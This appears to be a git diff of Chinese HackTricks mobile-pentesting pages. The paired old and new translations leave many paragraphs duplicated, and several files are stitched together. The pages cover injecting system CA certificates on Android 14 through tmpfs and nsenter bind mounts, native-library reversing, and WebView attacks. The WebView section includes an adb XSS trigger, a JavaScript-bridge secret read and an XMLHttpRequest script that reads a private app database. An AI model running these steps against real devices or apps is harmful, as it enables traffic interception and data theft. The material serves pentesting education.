在最新的Android 14版本中系统信任的证书颁发机构CA证书的处理方式发生了显著变化。以前这些证书存放在**`/system/etc/security/cacerts/`**中用户可以通过root权限访问和修改从而立即在系统中应用。然而在Android 14中存储位置已移至**`/apex/com.android.conscrypt/cacerts`**,这是**`/apex`**路径中的一个目录,天生是不可变的
尝试将**APEX cacerts 路径**重新挂载为可写会失败,因为系统不允许此类操作。即使尝试卸载或使用临时文件系统tmpfs覆盖该目录也无法绕过不可变性;应用程序仍将访问原始证书数据,而不管文件系统级别的更改。这种韧性是由于**`/apex`** 挂载配置为私有传播,确保**`/apex`** 目录内的任何修改不会影响其他进程。
尝试将**APEX cacerts路径**重新挂载为可写会失败因为系统不允许此类操作。即使尝试卸载或用临时文件系统tmpfs覆盖该目录也无法规避不可变性;应用程序继续访问原始证书数据,无论文件系统级别的更改如何。这种韧性是由于**`/apex`**挂载配置为PRIVATE传播确保**`/apex`**目录中的任何修改不会影响其他进程。
Android 的初始化涉及`init` 进程,该进程在启动操作系统时还会启动 Zygote 进程。该进程负责使用包含私有**`/apex`** 挂载的新挂载命名空间启动应用程序进程,从而将对该目录的更改与其他进程隔离开来
Android的初始化涉及`init`进程,该进程在启动操作系统时还会启动Zygote进程。该进程负责以新的挂载命名空间启动应用程序进程其中包括一个私有的**`/apex`**挂载,从而将对该目录的更改与其他进程隔离。
然而,对于需要修改**`/apex`** 目录内系统信任的 CA 证书的人来说,存在一种解决方法。这涉及手动重新挂载**`/apex`** 以去除私有传播,从而使其可写。该过程包括将**`/apex/com.android.conscrypt`** 的内容复制到另一个位置,卸载**`/apex/com.android.conscrypt`** 目录以消除只读约束,然后将内容恢复到**`/apex`** 中的原始位置。这种方法需要迅速行动,以避免系统崩溃。为了确保这些更改在整个系统范围内应用,建议重新启动`system_server`,这将有效地重新启动所有应用程序并使系统处于一致状态。
然而,对于需要修改**`/apex`**目录中系统信任的CA证书的人来说存在一种解决方法。这涉及手动重新挂载**`/apex`**以去除PRIVATE传播,从而使其可写。该过程包括将**`/apex/com.android.conscrypt`**的内容复制到另一个位置,卸载**`/apex/com.android.conscrypt`**目录以消除只读约束,然后将内容恢复到**`/apex`**中的原始位置。此方法需要迅速行动以避免系统崩溃。为了确保这些更改在系统范围内生效,建议重启`system_server`,这有效地重启所有应用程序并使系统恢复到一致状态。
```bash
# Create a separate temp directory, to hold the current certificates
# Otherwise, when we add the mount we can't read the current certs anymore.
@ -138,26 +139,26 @@ wait # Launched in parallel - wait for completion here
echo "System certificate injected"
```
### 通过 NSEnter 进行绑定挂载
### Bind-mounting through NSEnter
1. **设置可写目录**:首先,通过在现有的非 APEX 系统证书目录上挂载 `tmpfs` 来建立一个可写目录。使用以下命令实现:
1. **设置可写目录**: 最初通过在现有的非APEX系统证书目录上挂载一个 `tmpfs` 来建立一个可写目录。可以使用以下命令实现:
```bash
mount -t tmpfs tmpfs /system/etc/security/cacerts
```
2. **准备 CA 证书**:在设置可写目录后,应将打算使用的 CA 证书复制到该目录中。这可能涉及从 `/apex/com.android.conscrypt/cacerts/` 复制默认证书。必须相应地调整这些证书的权限和 SELinux 标签。
3. **为 Zygote 进行绑定挂载**:利用 `nsenter`,进入 Zygote 的挂载命名空间。Zygote 是负责启动 Android 应用程序的进程,需要执行此步骤以确保此后启动的所有应用程序都使用新配置的 CA 证书。使用的命令如下
2. **准备 CA 证书**:在设置可写目录后,应将打算使用的 CA 证书复制到该目录中。这可能涉及从 `/apex/com.android.conscrypt/cacerts/` 复制默认证书。必须相应地调整这些证书的权限和 SELinux 标签。
3. **为 Zygote 绑定挂载**:利用 `nsenter`,进入 Zygote 的挂载命名空间。Zygote 是负责启动 Android 应用程序的进程,这一步骤是确保所有随后启动的应用程序使用新配置的 CA 证书。使用的命令是
```bash
nsenter --mount=/proc/$ZYGOTE_PID/ns/mnt -- /bin/mount --bind /system/etc/security/cacerts /apex/com.android.conscrypt/cacerts
```
将确保每个新启动的应用程序都遵守更新后的 CA 证书设置。
确保了每个新启动的应用程序将遵循更新的 CA 证书设置。
4. **将更改应用于正在运行的应用程序**:要将更改应用于已经运行的应用程序,再次使用 `nsenter` 逐个进入每个应用程序的命名空间并执行类似的绑定挂载。必要的命令是:
4. **将更改应用于正在运行的应用程序**:要将更改应用于已经运行的应用程序,再次使用 `nsenter` 逐个进入每个应用程序的命名空间并执行类似的绑定挂载。必要的命令是:
```bash
nsenter --mount=/proc/$APP_PID/ns/mnt -- /bin/mount --bind /system/etc/security/cacerts /apex/com.android.conscrypt/cacerts
```
5. **替代方法 - 软重启**一种方法涉及在`init`进程PID 1上执行绑定挂载然后使用`stop && start`命令对操作系统进行软重启。这种方法将在所有命名空间中传播更改,避免了需要单独处理每个正在运行的应用程序的需要。然而,由于重新启动的不便,通常较少选择此方法
5. **替代方法 - 软重启**:一种替代方法涉及在 `init` 进程PID 1上执行绑定挂载然后使用 `stop && start` 命令对操作系统进行软件重启。此方法将更改传播到所有命名空间,避免逐个处理每个正在运行的应用程序。然而,由于重启的不便,这种方法通常不太受欢迎
## 参考
## 参考文献
* [https://httptoolkit.com/blog/android-14-install-system-ca-certificate/](https://httptoolkit.com/blog/android-14-install-system-ca-certificate/)
@ -165,16 +166,17 @@ nsenter --mount=/proc/$APP_PID/ns/mnt -- /bin/mount --bind /system/etc/security/
{% embed url="https://websec.nl/" %}
{% hint style="success" %}
Learn & practice AWS Hacking:<img src="/.gitbook/assets/arte.png" alt="" data-size="line">[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)<img src="/.gitbook/assets/arte.png" alt="" data-size="line">\
Learn & practice GCP Hacking: <img src="/.gitbook/assets/grte.png" alt="" data-size="line">[**HackTricks Training GCP Red Team Expert (GRTE)**<img src="/.gitbook/assets/grte.png" alt="" data-size="line">](https://training.hacktricks.xyz/courses/grte)
<details>
<summary><strong>从零开始学习AWS黑客技术成为专家</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTEHackTricks AWS Red Team Expert</strong></a><strong></strong></summary>
<summary>Support HackTricks</summary>
支持HackTricks的其他方式
* 如果您想看到您的**公司在HackTricks中做广告**或**下载PDF格式的HackTricks**,请查看[**订阅计划**](https://github.com/sponsors/carlospolop)!
* 获取[**官方PEASS & HackTricks周边产品**](https://peass.creator-spring.com)
* 探索[**PEASS家族**](https://opensea.io/collection/the-peass-family),我们的独家[**NFTs**](https://opensea.io/collection/the-peass-family)收藏品
* **加入** 💬 [**Discord群**](https://discord.gg/hRep4RUj7f) 或 [**电报群**](https://t.me/peass) 或在**Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks\_live)**上关注**我们。
* 通过向[**HackTricks**](https://github.com/carlospolop/hacktricks)和[**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github仓库提交PR来分享您的黑客技巧。
* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)!
* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks\_live)**.**
* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
</details>
{% endhint %}

98
mobile-pentesting/android-app-pentesting/reversing-native-libraries.md
View file

@ -1,26 +1,27 @@
# 反向工程本地库
{% hint style="success" %}
学习和实践 AWS 黑客技术:<img src="/.gitbook/assets/arte.png" alt="" data-size="line">[**HackTricks 培训 AWS 红队专家 (ARTE)**](https://training.hacktricks.xyz/courses/arte)<img src="/.gitbook/assets/arte.png" alt="" data-size="line">\
学习和实践 GCP 黑客技术:<img src="/.gitbook/assets/grte.png" alt="" data-size="line">[**HackTricks 培训 GCP 红队专家 (GRTE)**<img src="/.gitbook/assets/grte.png" alt="" data-size="line">](https://training.hacktricks.xyz/courses/grte)
<details>
<summary><strong>从零开始学习AWS黑客技术成为专家</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTEHackTricks AWS红队专家</strong></a><strong></strong></summary>
<summary>支持 HackTricks</summary>
支持HackTricks的其他方式
* 如果您想看到您的**公司在HackTricks中做广告**或**下载PDF格式的HackTricks**,请查看[**订阅计划**](https://github.com/sponsors/carlospolop)!
* 获取[**官方PEASS和HackTricks周边产品**](https://peass.creator-spring.com)
* 探索[**PEASS家族**](https://opensea.io/collection/the-peass-family),我们的独家[**NFTs**](https://opensea.io/collection/the-peass-family)收藏品
* **加入** 💬 [**Discord群**](https://discord.gg/hRep4RUj7f) 或 [**电报群**](https://t.me/peass) 或在**Twitter**上关注我们 🐦 [**@carlospolopm**](https://twitter.com/hacktricks\_live)**。**
* 通过向[**HackTricks**](https://github.com/carlospolop/hacktricks)和[**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github仓库提交PR来分享您的黑客技巧。
* 查看 [**订阅计划**](https://github.com/sponsors/carlospolop)!
* **加入** 💬 [**Discord 群组**](https://discord.gg/hRep4RUj7f) 或 [**Telegram 群组**](https://t.me/peass) 或 **在** **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks\_live)** 上关注我们。**
* **通过向** [**HackTricks**](https://github.com/carlospolop/hacktricks) 和 [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) GitHub 仓库提交 PR 来分享黑客技巧。
</details>
{% endhint %}
### [WhiteIntel](https://whiteintel.io)
<figure><img src="../../.gitbook/assets/image (1227).png" alt=""><figcaption></figcaption></figure>
[**WhiteIntel**](https://whiteintel.io) 是一个由**暗网**支持的搜索引擎,提供免费功能,用于检查公司或其客户是否受到**窃取恶意软件**的**侵害**
[**WhiteIntel**](https://whiteintel.io) 是一个由 **暗网** 驱动的搜索引擎,提供 **免费** 功能以检查公司或其客户是否已被 **窃取恶意软件** **入侵**
WhiteIntel的主要目标是打击由信息窃取恶意软件导致的账户劫持和勒索软件攻击。
WhiteIntel 的主要目标是打击由于信息窃取恶意软件导致的账户接管和勒索软件攻击。
您可以访问他们的网站并免费尝试他们的引擎:
@ -28,67 +29,68 @@ WhiteIntel的主要目标是打击由信息窃取恶意软件导致的账户劫
***
**更多信息请查看:** [**https://maddiestone.github.io/AndroidAppRE/reversing\_native\_libs.html**](https://maddiestone.github.io/AndroidAppRE/reversing\_native\_libs.html)
**有关更多信息请查看:** [**https://maddiestone.github.io/AndroidAppRE/reversing\_native\_libs.html**](https://maddiestone.github.io/AndroidAppRE/reversing\_native\_libs.html)
Android应用程序可以使用本地库通常用C或C++编写用于性能关键任务。恶意软件创建者也使用这些库因为它们比DEX字节码更难逆向工程。本节强调针对Android定制的逆向工程技能而不是教授汇编语言。提供了ARM和x86版本的库以确保兼容性。
Android 应用可以使用本地库,通常用 C 或 C++ 编写,以处理性能关键的任务。恶意软件创建者也使用这些库,因为它们比 DEX 字节码更难以反向工程。该部分强调针对 Android 的反向工程技能,而不是教授汇编语言。提供了 ARM x86 版本的库以确保兼容性。
### 关键点:
### 关键点:
* **Android应用程序中的本地库:**
* **Android 应用中的本地库:**
* 用于性能密集型任务。
* 用C或C++编写,使逆向工程具有挑战性。
* 以`.so`共享对象格式找到类似于Linux二进制文件。
* 用 C 或 C++ 编写,使反向工程具有挑战性。
* 以 `.so`(共享对象)格式存在,类似于 Linux 二进制文件。
* 恶意软件创建者更喜欢本地代码以增加分析难度。
* **Java本机接口JNIAndroid NDK**
* JNI允许在本地代码中实现Java方法。
* NDK是用于编写本地代码的Android特定工具集
* JNI和NDK将Java或Kotlin代码与本地库连接起来。
* **库加载执行:**
* 使用`System.loadLibrary`或`System.load`将库加载到内存中。
* 在加载时执行JNI\_OnLoad。
* Java声明的本机方法链接到本机函数,实现执行。
* **将Java方法链接到本机函数:**
* **动态链接:**本地库中的函数名称与特定模式匹配,允许自动链接。
* **静态链接:**使用`RegisterNatives`进行链接,提供函数命名和结构的灵活性。
* **向工程工具和技术:**
* 工具如Ghidra和IDA Pro有助于分析本地库。
* `JNIEnv`理解JNI函数和交互至关重要。
* 提供练习以实践加载库、链接方法和识别本函数。
* **Java 本地接口 (JNI) 和 Android NDK**
* JNI 允许在本地代码中实现 Java 方法。
* NDK 是一组特定于 Android 的工具,用于编写本地代码
* JNI NDK Java Kotlin代码与本地库连接起来。
* **库加载执行:**
* 使用 `System.loadLibrary` `System.load` 将库加载到内存中。
* 在加载时执行 JNI\_OnLoad。
* Java 声明的本地方法链接到本地函数,从而启用执行。
* **将 Java 方法链接到本地函数:**
* **动态链接:** 本地库中的函数名称匹配特定模式,允许自动链接。
* **静态链接:** 使用 `RegisterNatives` 进行链接,提供函数命名和结构的灵活性。
* **向工程工具和技术:**
* Ghidra IDA Pro 等工具有助于分析本地库。
* `JNIEnv` 对理解 JNI 函数和交互至关重要。
* 提供练习以实践加载库、链接方法和识别本函数。
### 资源:
* **学习ARM汇编**
* **学习 ARM 汇编:**
* 建议深入了解底层架构。
* 推荐来自Azeria Labs的[ARM汇编基础知识](https://azeria-labs.com/writing-arm-assembly-part-1/)。
* **JNI和NDK文档**
* [Oracle的JNI规范](https://docs.oracle.com/javase/7/docs/technotes/guides/jni/spec/jniTOC.html)
* [Android的JNI技巧](https://developer.android.com/training/articles/perf-jni)
* [开始使用NDK](https://developer.android.com/ndk/guides/)
* 推荐 [Azeria Labs 的 ARM 汇编基础](https://azeria-labs.com/writing-arm-assembly-part-1/)。
* **JNI NDK 文档:**
* [Oracle JNI 规范](https://docs.oracle.com/javase/7/docs/technotes/guides/jni/spec/jniTOC.html)
* [Android 的 JNI 提示](https://developer.android.com/training/articles/perf-jni)
* [开始使用 NDK](https://developer.android.com/ndk/guides/)
* **调试本地库:**
* [使用JEB反编译器调试Android本地库](https://medium.com/@shubhamsonani/how-to-debug-android-native-libraries-using-jeb-decompiler-eec681a22cf3)
* [使用 JEB 反编译器调试 Android 本地库](https://medium.com/@shubhamsonani/how-to-debug-android-native-libraries-using-jeb-decompiler-eec681a22cf3)
### [WhiteIntel](https://whiteintel.io)
<figure><img src="../../.gitbook/assets/image (1227).png" alt=""><figcaption></figcaption></figure>
[**WhiteIntel**](https://whiteintel.io) 是一个由**暗网**支持的搜索引擎,提供免费功能,用于检查公司或其客户是否受到**窃取恶意软件**的**侵害**
[**WhiteIntel**](https://whiteintel.io) 是一个由 **暗网** 驱动的搜索引擎,提供 **免费** 功能以检查公司或其客户是否已被 **窃取恶意软件** **入侵**
WhiteIntel的主要目标是打击由信息窃取恶意软件导致的账户劫持和勒索软件攻击。
WhiteIntel 的主要目标是打击由于信息窃取恶意软件导致的账户接管和勒索软件攻击。
您可以访问他们的网站并免费尝试他们的引擎:
{% embed url="https://whiteintel.io" %}
{% hint style="success" %}
学习和实践 AWS 黑客技术:<img src="/.gitbook/assets/arte.png" alt="" data-size="line">[**HackTricks 培训 AWS 红队专家 (ARTE)**](https://training.hacktricks.xyz/courses/arte)<img src="/.gitbook/assets/arte.png" alt="" data-size="line">\
学习和实践 GCP 黑客技术:<img src="/.gitbook/assets/grte.png" alt="" data-size="line">[**HackTricks 培训 GCP 红队专家 (GRTE)**<img src="/.gitbook/assets/grte.png" alt="" data-size="line">](https://training.hacktricks.xyz/courses/grte)
<details>
<summary><strong>从零开始学习AWS黑客技术成为专家</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTEHackTricks AWS红队专家</strong></a><strong></strong></summary>
<summary>支持 HackTricks</summary>
支持HackTricks的其他方式
* 如果您想看到您的**公司在HackTricks中做广告**或**下载PDF格式的HackTricks**,请查看[**订阅计划**](https://github.com/sponsors/carlospolop)!
* 获取[**官方PEASS和HackTricks周边产品**](https://peass.creator-spring.com)
* 探索[**PEASS家族**](https://opensea.io/collection/the-peass-family),我们的独家[**NFTs**](https://opensea.io/collection/the-peass-family)收藏品
* **加入** 💬 [**Discord群**](https://discord.gg/hRep4RUj7f) 或 [**电报群**](https://t.me/peass) 或在**Twitter**上关注我们 🐦 [**@carlospolopm**](https://twitter.com/hacktricks\_live)**。**
* 通过向[**HackTricks**](https://github.com/carlospolop/hacktricks)和[**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github仓库提交PR来分享您的黑客技巧。
* 查看 [**订阅计划**](https://github.com/sponsors/carlospolop)!
* **加入** 💬 [**Discord 群组**](https://discord.gg/hRep4RUj7f) 或 [**Telegram 群组**](https://t.me/peass) 或 **在** **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks\_live)** 上关注我们。**
* **通过向** [**HackTricks**](https://github.com/carlospolop/hacktricks) 和 [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) GitHub 仓库提交 PR 来分享黑客技巧。
</details>
{% endhint %}

100
mobile-pentesting/android-app-pentesting/webview-attacks.md
View file

@ -1,66 +1,67 @@
# WebView 攻击
# Webview 攻击
{% hint style="success" %}
学习与实践 AWS 黑客技术:<img src="/.gitbook/assets/arte.png" alt="" data-size="line">[**HackTricks 培训 AWS 红队专家 (ARTE)**](https://training.hacktricks.xyz/courses/arte)<img src="/.gitbook/assets/arte.png" alt="" data-size="line">\
学习与实践 GCP 黑客技术:<img src="/.gitbook/assets/grte.png" alt="" data-size="line">[**HackTricks 培训 GCP 红队专家 (GRTE)**<img src="/.gitbook/assets/grte.png" alt="" data-size="line">](https://training.hacktricks.xyz/courses/grte)
<details>
<summary><strong>从零开始学习 AWS 黑客技术,成为专家</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTEHackTricks AWS 红队专家)</strong></a><strong></strong></summary>
<summary>支持 HackTricks</summary>
支持 HackTricks 的其他方式:
* 如果您想看到您的**公司在 HackTricks 中做广告**或**下载 PDF 版本的 HackTricks**,请查看[**订阅计划**](https://github.com/sponsors/carlospolop)!
* 获取[**官方 PEASS & HackTricks 商品**](https://peass.creator-spring.com)
* 探索[**PEASS 家族**](https://opensea.io/collection/the-peass-family),我们的独家[**NFTs**](https://opensea.io/collection/the-peass-family)
* **加入** 💬 [**Discord 群组**](https://discord.gg/hRep4RUj7f) 或 [**电报群组**](https://t.me/peass) 或在 **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks\_live)** 上关注我们**。
* 通过向 [**HackTricks**](https://github.com/carlospolop/hacktricks) 和 [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github 仓库提交 PR 来分享您的黑客技巧。
* 查看 [**订阅计划**](https://github.com/sponsors/carlospolop)!
* **加入** 💬 [**Discord 群组**](https://discord.gg/hRep4RUj7f) 或 [**Telegram 群组**](https://t.me/peass) 或 **关注** 我们的 **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks\_live)**.**
* **通过向** [**HackTricks**](https://github.com/carlospolop/hacktricks) 和 [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) GitHub 仓库提交 PR 分享黑客技巧。
</details>
{% endhint %}
## WebView 配置安全指南
## WebView 配置安全指南
### WebView 漏洞概述
Android 开发的一个关键方面是正确处理 WebViews。本指南重点介绍了用于减轻与 WebView 使用相关风险的关键配置和安全实践
Android 开发的一个关键方面是正确处理 WebViews。本指南强调了关键配置和安全实践,以减轻与 WebView 使用相关的风险
![WebView 示例](<../../.gitbook/assets/image (1190).png>)
### **WebViews 中的文件访问**
默认情况下WebViews 允许文件访问。此功能由 `setAllowFileAccess()` 方法控制,自 Android API 级别 3杯子蛋糕 1.5)起可用。具有 **android.permission.READ\_EXTERNAL\_STORAGE** 权限的应用程序可以使用文件 URL 方案(`file://path/to/file`)从外部存储器中读取文件。
默认情况下WebViews 允许文件访问。此功能由 `setAllowFileAccess()` 方法控制,自 Android API 级别 3Cupcake 1.5)以来可用。具有 **android.permission.READ\_EXTERNAL\_STORAGE** 权限的应用可以使用文件 URL 方案(`file://path/to/file`)从外部存储读取文件。
#### **已弃用功能:通用和来自 URL 的文件访问**
#### **已弃用功能:来自 URL 的通用和文件访问**
* **来自 URL 的通用访问**:此已弃用功能允许从 URL 文件进行跨源请求,由于潜在的 XSS 攻击风险,造成了重大安全风险。针对 Android Jelly Bean 及更新版本的应用程序,默认设置为禁用(`false`)。
* **来自文件 URL 的通用访问**:此已弃用功能允许来自文件 URL 的跨源请求,由于潜在的 XSS 攻击,构成了重大安全风险。默认设置在针对 Android Jelly Bean 及更高版本的应用中被禁用(`false`)。
* 要检查此设置,请使用 `getAllowUniversalAccessFromFileURLs()`
* 要修改此设置,请使用 `setAllowUniversalAccessFromFileURLs(boolean)`
* **来自 URL 的文件访问**:此功能也已弃用,控制对其他文件方案 URL 中内容的访问。与通用访问类似,出于增强安全性的考虑,默认设置为禁用
* 使用 `getAllowFileAccessFromFileURLs()` 进行检查,使用 `setAllowFileAccessFromFileURLs(boolean)` 进行设置。
* **来自文件 URL 的文件访问**:此功能也已弃用,控制来自其他文件方案 URL 的内容访问。与通用访问一样,其默认设置为禁用,以增强安全性
* 使用 `getAllowFileAccessFromFileURLs()` 检查,使用 `setAllowFileAccessFromFileURLs(boolean)` 设置。
#### **安全文件加载**
为了在仍然访问资产和资源的同时禁用文件系统访问,使用 `setAllowFileAccess()` 方法。在 Android R 及更高版本中,默认设置为 `false`
为了在仍然访问资产和资源的同时禁用文件系统访问,使用 `setAllowFileAccess()` 方法。对于 Android R 及更高版本,默认设置为 `false`
* 使用 `getAllowFileAccess()` 进行检查。
* 使用 `getAllowFileAccess()` 检查。
* 使用 `setAllowFileAccess(boolean)` 启用或禁用。
#### **WebViewAssetLoader**
**WebViewAssetLoader** 类是加载本地文件的现代方法。它使用 http(s) URL 访问本地资产和资源,符合同源策略,从而便于 CORS 管理。
**WebViewAssetLoader** 类是加载本地文件的现代方法。它使用 http(s) URL 访问本地资产和资源,符合同源策略,从而促进 CORS 管理。
### loadUrl
这是在 WebView 中加载任意 URL 的常用函数
这是一个常用函数,用于在 webview 中加载任意 URL
```java
webview.loadUrl("<url here>")
```
当然,潜在的攻击者绝不能能够**控制应用程序将要加载的URL**
Ofc潜在攻击者绝不应该能够 **控制应用程序将要加载的 URL**
### **JavaScript和Intent Scheme处理**
### **JavaScript Intent Scheme 处理**
- **JavaScript**在WebViews中默认禁用可以通过`setJavaScriptEnabled()`启用。建议谨慎操作因为未经适当保护启用JavaScript可能会引入安全漏洞。
- **Intent Scheme**WebViews可以处理`intent` scheme如果不小心管理可能会导致利用漏洞。一个示例漏洞涉及到一个暴露的WebView参数"support\_url"可能被利用来执行跨站脚本XSS攻击。
* **JavaScript**:在 WebViews 中默认禁用,可以通过 `setJavaScriptEnabled()` 启用。建议谨慎操作,因为在没有适当保护的情况下启用 JavaScript 可能会引入安全漏洞。
* **Intent Scheme**WebViews 可以处理 `intent` scheme如果管理不当可能会导致漏洞。一个示例漏洞涉及一个暴露的 WebView 参数 "support\_url",可以被利用来执行跨站脚本 (XSS) 攻击。
![易受攻击的WebView](<../../.gitbook/assets/image (1191).png>)
![Vulnerable WebView](<../../.gitbook/assets/image (1191).png>)
使用adb的利用示例
使用 adb 的利用示例:
{% code overflow="wrap" %}
```bash
@ -68,39 +69,39 @@ adb.exe shell am start -n com.tmh.vulnwebview/.SupportWebView es support_url
```
{% endcode %}
### JavaScript桥接
### Javascript Bridge
Android提供了一个功能允许在WebView中启用**JavaScript**来调用**本机Android应用程序功能**。这是通过利用`addJavascriptInterface`方法实现的该方法将JavaScript与本机Android功能集成在一起称为_WebView JavaScript桥接_。建议谨慎使用此方法因为该方法允许WebView中的所有页面访问已注册的JavaScript接口对象如果通过这些接口公开敏感信息则存在安全风险。
Android 提供了一项功能,使得 **JavaScript** 在 WebView 中能够调用 **本地 Android 应用程序功能**。这通过利用 `addJavascriptInterface` 方法实现,该方法将 JavaScript 与本地 Android 功能集成,称为 _WebView JavaScript bridge_。需要谨慎,因为此方法允许 WebView 中的所有页面访问注册的 JavaScript 接口对象,如果通过这些接口暴露敏感信息,则会带来安全风险。
* 针对Android版本低于4.2的应用程序需要**极度谨慎**因为存在一个漏洞允许通过恶意JavaScript利用反射进行远程代码执行
* **对于目标 Android 版本低于 4.2 的应用程序,必须极其谨慎**,因为存在一个漏洞,允许通过恶意 JavaScript 进行远程代码执行,利用反射进行攻击
#### 实现JavaScript桥接
#### Implementing a JavaScript Bridge
* **JavaScript接口**可以与本机代码交互,如示例所示,将一个类方法暴露给JavaScript
* **JavaScript 接口** 可以与本地代码交互,如示例所示,其中一个类方法被暴露给 JavaScript
```javascript
@JavascriptInterface
public String getSecret() {
return "SuperSecretPassword";
};
```
* 通过向 WebView 添加一个接口来启用 JavaScript Bridge
* JavaScript Bridge 通过向 WebView 添加接口来启用:
```javascript
webView.addJavascriptInterface(new JavascriptBridge(), "javascriptBridge");
webView.reload();
```
* 通过 JavaScript 可能会存在潜在的利用,例如通过 XSS 攻击,从而调用暴露的 Java 方法:
* 通过 JavaScript 的潜在利用,例如,通过 XSS 攻击,可以调用暴露的 Java 方法:
```html
<script>alert(javascriptBridge.getSecret());</script>
```
* 为了减少风险,**限制 JavaScript 桥接的使用**仅限于随 APK 一起提供的代码,并防止从远程来源加载 JavaScript。对于较旧的设备,将最低 API 级别设置为 17。
* 为了降低风险,**限制 JavaScript 桥接使用** 仅限于随 APK 打包的代码,并防止从远程源加载 JavaScript。对于旧设备,将最低 API 级别设置为 17。
### 基于反射的远程代码执行RCE
### 基于反射的远程代码执行 (RCE)
* 通过反射执行特定有效负载可以实现 RCE但是 `@JavascriptInterface` 注解防止未经授权的方法访问,限制了攻击面。
* 一种文档化的方法允许通过反射执行特定有效负载来实现 RCE。然而`@JavascriptInterface` 注解防止未经授权的方法访问,从而限制了攻击面。
### 远程调试
* 使用 **Chrome 开发者工具** 可以进行 **远程调试**,在 WebView 内容中实现交互和任意 JavaScript 执行。
* **远程调试** 可以通过 **Chrome 开发者工具** 实现,允许在 WebView 内容中进行交互和任意 JavaScript 执行。
#### 启用远程调试
@ -110,16 +111,16 @@ if (Build.VERSION.SDK_INT >= Build.VERSION_CODES.KITKAT) {
WebView.setWebContentsDebuggingEnabled(true);
}
```
* 根据应用程序的 debuggable 状态有条件地启用调试:
* 根据应用程序的可调试状态有条件地启用调试:
```java
if (Build.VERSION.SDK_INT >= Build.VERSION_CODES.KITKAT) {
if (0 != (getApplicationInfo().flags & ApplicationInfo.FLAG_DEBUGGABLE))
{ WebView.setWebContentsDebuggingEnabled(true); }
}
```
## 泄露任意文件
## 导出任意文件
* 演示使用XMLHttpRequest泄露任意文件:
* 演示使用 XMLHttpRequest 导出任意文件:
```javascript
var xhr = new XMLHttpRequest();
xhr.onreadystatechange = function() {
@ -130,7 +131,7 @@ alert(xhr.responseText);
xhr.open('GET', 'file:///data/data/com.authenticationfailure.wheresmybrowser/databases/super_secret.db', true);
xhr.send(null);
```
## 参考资料
## 参考文献
* [https://labs.integrity.pt/articles/review-android-webviews-fileaccess-attack-vectors/index.html](https://labs.integrity.pt/articles/review-android-webviews-fileaccess-attack-vectors/index.html)
* [https://github.com/authenticationfailure/WheresMyBrowser.Android](https://github.com/authenticationfailure/WheresMyBrowser.Android)
@ -138,16 +139,17 @@ xhr.send(null);
* [https://medium.com/@justmobilesec/deep-links-webviews-exploitations-part-ii-5c0b118ec6f1](https://medium.com/@justmobilesec/deep-links-webviews-exploitations-part-ii-5c0b118ec6f1)
* [https://www.justmobilesec.com/en/blog/deep-links-webviews-exploitations-part-I](https://www.justmobilesec.com/en/blog/deep-links-webviews-exploitations-part-I)
{% hint style="success" %}
学习和实践 AWS Hacking:<img src="/.gitbook/assets/arte.png" alt="" data-size="line">[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)<img src="/.gitbook/assets/arte.png" alt="" data-size="line">\
学习和实践 GCP Hacking: <img src="/.gitbook/assets/grte.png" alt="" data-size="line">[**HackTricks Training GCP Red Team Expert (GRTE)**<img src="/.gitbook/assets/grte.png" alt="" data-size="line">](https://training.hacktricks.xyz/courses/grte)
<details>
<summary><strong>从零开始学习AWS黑客技术</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTEHackTricks AWS Red Team Expert</strong></a><strong></strong></summary>
<summary>支持 HackTricks</summary>
支持HackTricks的其他方式
* 如果您想看到您的**公司在HackTricks中做广告**或**下载PDF格式的HackTricks**,请查看[**订阅计划**](https://github.com/sponsors/carlospolop)!
* 获取[**官方PEASS & HackTricks周边产品**](https://peass.creator-spring.com)
* 探索[**PEASS Family**](https://opensea.io/collection/the-peass-family),我们的独家[NFTs](https://opensea.io/collection/the-peass-family)收藏品
* **加入** 💬 [**Discord群**](https://discord.gg/hRep4RUj7f) 或 [**电报群**](https://t.me/peass) 或在**Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks\_live)**上关注**我们。
* 通过向[**HackTricks**](https://github.com/carlospolop/hacktricks)和[**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github仓库提交PR来分享您的黑客技巧。
* 查看 [**订阅计划**](https://github.com/sponsors/carlospolop)!
* **加入** 💬 [**Discord 群组**](https://discord.gg/hRep4RUj7f) 或 [**telegram 群组**](https://t.me/peass) 或 **在** **Twitter** 🐦 **上关注我们** [**@hacktricks\_live**](https://twitter.com/hacktricks\_live)**.**
* **通过向** [**HackTricks**](https://github.com/carlospolop/hacktricks) 和 [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github 仓库提交 PR 来分享黑客技巧。
</details>
{% endhint %}

137
mobile-pentesting/ios-pentesting-checklist.md
View file

@ -1,26 +1,27 @@
# iOS 渗透测试清单
# iOS Pentesting Checklist
<figure><img src="../.gitbook/assets/image (48).png" alt=""><figcaption></figcaption></figure>
\
